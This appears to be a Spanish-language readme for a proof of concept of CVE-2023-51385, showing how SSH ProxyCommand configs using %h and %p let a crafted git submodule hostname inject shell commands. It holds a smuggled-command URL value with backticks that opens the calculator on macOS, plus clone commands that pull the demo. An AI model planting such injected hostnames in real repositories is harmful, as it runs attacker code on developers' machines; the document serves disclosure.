
Prueba de concepto para explotar configuraciones de proxycommand vulnerables en clientes ssh (CVE-2023-51385)
~/.ssh/config inseguroEl uso de tokens como %h, %p en ProxyCommand es bastante popular para utilizar túneles y proxy de conexión mediante SSH.
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Nota: en mi evaluación inicial tenía la impresión de que usar '%h` (comillas simples) evitaría esto, pero parece que eso sigue siendo vulnerable con algo como:
url = ssh://'`open -aCalculator`'foo.example.com/bar
Tomado de: https://man.openbsd.org/ssh_config#ProxyCommand
Un submódulo que explotaría esta vulnerabilidad para abrir una calculadora en OSX.
Pruébalo usando:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
o
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules